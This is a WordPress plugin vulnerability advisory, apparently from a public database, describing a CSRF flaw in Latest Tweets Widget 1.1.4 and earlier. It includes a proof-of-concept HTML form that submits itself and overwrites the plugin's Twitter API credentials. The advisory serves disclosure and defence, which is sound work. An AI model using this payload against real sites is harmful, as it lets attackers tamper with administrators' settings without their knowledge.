WordPress Plugin Vulnerabilities
Latest Tweets Widget <= 1.1.4 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=twitter-api-admin" method="POST"> <input type="text" name="saf_twitter[consumer_key]" value="hacked"> <input type="text" name="saf_twitter[consumer_secret]" value="hacked"> <input type="text" name="saf_twitter[access_key]" value=""> <input type="text" name="saf_twitter[access_secret]" value=""> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-18 (about 2 years ago)
Added
2022-05-18 (about 2 years ago)
Last Updated
2023-02-09 (about 1 years ago)